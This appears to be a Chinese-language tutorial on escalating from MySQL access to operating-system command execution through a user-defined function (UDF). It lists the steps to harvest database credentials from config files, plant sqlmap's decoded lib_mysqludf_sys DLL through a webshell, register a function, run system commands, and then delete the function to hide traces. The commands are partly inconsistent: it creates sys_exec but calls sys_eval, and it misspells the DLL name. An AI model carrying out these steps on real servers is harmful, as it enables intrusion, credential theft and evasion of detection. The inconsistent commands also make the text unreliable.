UDF

一、收集信息

查看网站配置文件获取数据库的账号和密码（此处演示是mysql数据库）
数据库配置文件：conn、config、data、sql、common 、inc等
数据库目录文件：安装目录/data/mysql/user.myd和user.frm（user.myd是mysql数据库中user表中内容，user,frm是user表中的列名）

select version();                        //获取数据库版本
select user();                           //获取数据库用户
select @@basedir;                        //获取数据库安装目录
show variables like "%char%";            //寻找mysql安装路径
select @@version_compile_os;			 // 查看mysql是多少位的

二、MySQL版本高于5.1，创建文件夹

MySQL版本高于5.1，lib/plugin目录本身是不存在的。需要我们用webshell在mysql安装路径下创建lib/plugin，再导入udf.dll(根据mysql的位数导入udf.ll)

MySQL版本小于5.1， udf.dll文件在windows server 2003下放置于c:\windows\system32目录，在windows server 2000下放置在c:\winnt\system32目录

三、导入UDF.LL

SQLmap可以实现导出dll文件，目录在 sqlmap/udf/mysql/windows（这里的32位/64位，指的是mysql的位数），如果位数错误则会报错。
SQLmap里的duf.dll是经过编码的使用 sqlmap/extra/cloak目录下的 cloak.py进行解码

cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_

将dll文件上传到mysql的/lib/plugin目录下：创建sys_exec函数

create function sys_exec  returns string soname "lib_mysqludf_sys.dll";

四.执行命令

select sys_eval ('whoami');

五.清除痕迹

drop function sys_eval;             //将函数删除